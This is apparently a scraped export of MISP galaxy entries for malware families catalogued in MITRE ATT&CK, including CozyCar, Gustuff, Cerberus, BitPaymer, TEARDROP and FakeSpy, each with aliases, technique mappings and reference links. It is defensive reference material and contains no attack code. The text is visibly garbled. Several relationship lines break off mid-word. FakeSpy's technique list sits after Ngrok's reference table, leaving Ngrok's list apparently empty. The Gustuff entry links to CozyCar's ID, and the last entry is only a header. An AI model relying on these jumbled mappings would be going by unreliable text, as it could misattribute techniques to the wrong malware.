• uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1532" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://securitywithoutborders.org/blog/2019/03/29/exodus.html">https://securitywithoutborders.org/blog/2019/03/29/exodus.html</a></td>
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</table>
CozyCar - S0046

[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)

The tag is: misc-galaxy:mitre-malware="CozyCar - S0046"

CozyCar - S0046 is also known as:

- CozyCar
- CozyDuke
- CozyBear
- Cozer
- EuroAPT

CozyCar - S0046 has relationships with:

- uses: misc-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
- uses: misc-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

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<tr>
<td><a href="https://attack.mitre.org/software/S0046">https://attack.mitre.org/software/S0046</a></td>
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ELMER - S0064

[ELMER](https://attack.mitre.org/software/S0064) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://attack.mitre.org/groups/G0023). (Citation: FireEye EPS Awakens Part 2)

The tag is: misp-galaxy:mitre-malware="ELMER - S0064"

ELMER - S0064 is also known as:

• ELMER

ELMER - S0064 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0064">https://attack.mitre.org/software/S0064</a></td>
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<tr>
<td><a href="https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html">https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html</a></td>
</tr>
</tbody>
</table>

Gustuff - S0406

[Gustuff](https://attack.mitre.org/software/S0046) is mobile malware designed to steal users’ banking and virtual currency credentials. (Citation: Talos Gustuff Apr 2019)

The tag is: misp-galaxy:mitre-malware="Gustuff - S0406"
Gustuff - S0406 is also known as:

- Gustuff

Gustuff - S0406 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0406">https://attack.mitre.org/software/S0406</a></td>
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<td><a href="https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html">https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html</a></td>
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</table>
BBK - S0470

[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: `misp-galaxy:mitre-malware="BBK - S0470"`

BBK - S0470 is also known as:

- BBK

BBK - S0470 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0470">https://attack.mitre.org/software/S0470</a></td>
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Monokle - S0407

[Monokle](https://attack.mitre.org/software/S0407) is targeted, sophisticated mobile surveillanceware. It is developed for Android, but there are some code artifacts that suggests an iOS version may be in development.(Citation: Lookout-Monokle)

The tag is: `misp-galaxy:mitre-malware="Monokle - S0407"`

Monokle - S0407 is also known as:

- Monokle
Monokle - S0407 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Remote File Copy - T1544" with estimative-
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<td><a href="https://attack.mitre.org/software/S0407">https://attack.mitre.org/software/S0407</a></td>
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**Sakula - S0074**

[Sakula](https://attack.mitre.org/software/S0074) is a remote access tool (RAT) that first surfaced in 2012 and was used in intrusions throughout 2015. (Citation: Dell Sakula)

The tag is: `misp-galaxy:mitre-malware="Sakula - S0074"`

Sakula - S0074 is also known as:

- Sakula
- Sakurel
- VIPER

Sakula - S0074 has relationships with:

- similar: `misp-galaxy:rat="Sakula"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:tool="Sakula"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Sakula RAT"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern=\"Ingress Tool Transfer - T1105\"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
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Cerberus - S0480

[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)

The tag is: `misp-galaxy:mitre-malware="Cerberus - S0480"`

Cerberus - S0480 is also known as:

- Cerberus

Cerberus - S0480 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1417" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Prompt - T1411" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Install Insecure or Malicious Configuration - T1478" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-
language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Input Injection - T1516" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"

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**PinchDuke - S0048**

[PinchDuke](https://attack.mitre.org/software/S0048) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2008 to 2010. (Citation: F-Secure The Dukes)

The tag is: `misp-galaxy:mitre-malware="PinchDuke - S0048"`

PinchDuke - S0048 is also known as:

- PinchDuke

PinchDuke - S0048 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-
GeminiDuke - S0049

[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)

The tag is: *misp-galaxy:mitre-malware="GeminiDuke - S0049"*

GeminiDuke - S0049 is also known as:

- GeminiDuke

GeminiDuke - S0049 has relationships with:

- similar: *misp-galaxy:tool="GeminiDuke"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Local Account - T1087.001"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"* with estimative-

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<td><a href="https://attack.mitre.org/software/S0048">https://attack.mitre.org/software/S0048</a></td>
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</table>
Machete - S0409

[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset used by [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines that was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)

The tag is: `misp-galaxy:mitre-malware="Machete - S0409"`

Machete - S0409 is also known as:

- Machete
- Pyark

Machete - S0409 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Exfiltration over USB - T1052.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Browser Bookmark Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://securelist.com/el-machete/66108/">https://securelist.com/el-machete/66108/</a></td>
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DoubleAgent - S0550

[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)

The tag is: misp-galaxy:mitre-malware="DoubleAgent - S0550"

DoubleAgent - S0550 is also known as:

• DoubleAgent
DoubleAgent - S0550 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1420" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploit OS Vulnerability - T1404" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
RARSTONE - S0055

[RARSTONE](https://attack.mitre.org/software/S0055) is malware used by the [Naikon](https://attack.mitre.org/groups/G0019) group that has some characteristics similar to [PlugX](https://attack.mitre.org/software/S0013). (Citation: Aquino RARSTONE)

The tag is: `misp-galaxy:mitre-malware="RARSTONE - S0055"`

RARSTONE - S0055 is also known as:

- RARSTONE

RARSTONE - S0055 has relationships with:

- similar: `misp-galaxy:tool="RARSTONE"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with `estimative-language:likelihood-probability="almost-certain"`

Table 4567. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0055">https://attack.mitre.org/software/S0055</a></td>
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</table>

TEARDROP - S0560

[TEARDROP](https://attack.mitre.org/software/S0560) is a memory-only dropper that was discovered on some victim machines during investigations related to the 2020 SolarWinds cyber intrusion. It was likely used by [APT29](https://attack.mitre.org/groups/G0016) since at least May 2020. (Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Deep Dive Solorigiate January 2021)

The tag is: `misp-galaxy:mitre-malware="TEARDROP - S0560"`

TEARDROP - S0560 is also known as:

- TEARDROP
TEARDROP - S0560 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4568. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0560">https://attack.mitre.org/software/S0560</a></td>
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</table>

ViperRAT - S0506

[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT)

The tag is: misp-galaxy:mitre-malware="ViperRAT - S0506"

ViperRAT - S0506 is also known as:

- ViperRAT

ViperRAT - S0506 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1533" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Download New Code at Runtime - T1407" with
estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"

**Table 4569. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0506">https://attack.mitre.org/software/S0506</a></td>
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<tr>
<td><a href="https://blog.lookout.com/viperrat-mobile-apt">https://blog.lookout.com/viperrat-mobile-apt</a></td>
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</table>

**BitPaymer - S0570**

[BitPaymer](https://attack.mitre.org/software/S0570) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://attack.mitre.org/software/S0570) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://attack.mitre.org/software/S0570) has several indicators suggesting overlap with the [Dridex](https://attack.mitre.org/software/S0384) malware and is often delivered via [Dridex](https://attack.mitre.org/software/S0384). (Citation: Crowdstrike Indrik November 2018)

The tag is: `misp-galaxy:mitre-malware="BitPaymer - S0570"`

BitPaymer - S0570 is also known as:

- BitPaymer
- wp_encrypt
- FriedEx

BitPaymer - S0570 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 4570. Table References

Links

https://attack.mitre.org/software/S0570
**eSurv - S0507**

[eSurv](https://attack.mitre.org/software/S0507) is mobile surveillanceware designed for the lawful intercept market that was developed over the course of many years.(Citation: Lookout eSurv)

The tag is: `misp-galaxy:mitre-malware="eSurv - S0507"`

**eSurv - S0507 is also known as:**

- eSurv

**eSurv - S0507 has relationships with:**

- uses: `misp-galaxy:mitre-attack-pattern="Location Tracking - T1430"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1533"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Geofencing - T1581"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"` with estimative-language:likelihood-probability="almost-certain"

**Table 4571. Table References**

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<td><a href="https://attack.mitre.org/software/S0507">https://attack.mitre.org/software/S0507</a></td>
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<tr>
<td><a href="https://blog.lookout.com/esurv-research">https://blog.lookout.com/esurv-research</a></td>
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**SslMM - S0058**

[SslMM](https://attack.mitre.org/software/S0058) is a full-featured backdoor used by [Naikon](https://attack.mitre.org/groups/G0019) that has multiple variants. (Citation: Baumgartner Naikon 2015)

The tag is: `misp-galaxy:mitre-malware="SslMM - S0058"`

SslMM - S0058 is also known as:

- SslMM

SslMM - S0058 has relationships with:

- similar: `misp-galaxy:malpedia="SslMM"` with `estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with `estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with `estimative-language:likelihood-probability="almost-certain"

*Table 4572. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0058">https://attack.mitre.org/software/S0058</a></td>
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</table>

**Ngrok - S0508**

[Ngrok](https://attack.mitre.org/software/S0508) is a legitimate reverse proxy tool that can create a
secure tunnel to servers located behind firewalls or on local machines that do not have a public IP. [Ngrok](https://attack.mitre.org/software/S0508) has been leveraged by threat actors in several campaigns including use for lateral movement and data exfiltration.(Citation: Zdnet Ngrok September 2018)(Citation: FireEye Maze May 2020)(Citation: Cyware Ngrok May 2019)

The tag is: `misp-galaxy:mitre-malware="Ngrok - S0508"

Ngrok - S0508 is also known as:

- Ngrok

Ngrok - S0508 has relationships with:


**FakeSpy - S0509**

[FakeSpy](https://attack.mitre.org/software/S0509) is Android spyware that has been operated by the Chinese threat actor behind the Roaming Mantis campaigns.(Citation: Cybereason FakeSpy)

The tag is: `misp-galaxy:mitre-malware="FakeSpy - S0509"

FakeSpy - S0509 is also known as:

- FakeSpy

FakeSpy - S0509 has relationships with:

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**Table 4573. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0508">https://attack.mitre.org/software/S0508</a></td>
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</table>
- uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="SMS Control - T1582" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Network Information Discovery - T1507" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Suppress Application Icon - T1508" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523" with estimative-language:likelihood-probability="almost-certain"

*Table 4574. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0509">https://attack.mitre.org/software/S0509</a></td>
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</table>

**WinMM - S0059**

[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)
The tag is: `misp-galaxy:mitre-malware="WinMM - S0059"`

**WinMM - S0059** is also known as:

- WinMM

**WinMM - S0059** has relationships with:

- similar: `misp-galaxy:malpedia="WinMM"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"` with `estimative-language:likelihood-probability="almost-certain"`

*Table 4575. Table References*

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<tr>
<td><a href="https://attack.mitre.org/software/S0059">https://attack.mitre.org/software/S0059</a></td>
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</table>

**FakeM - S0076**

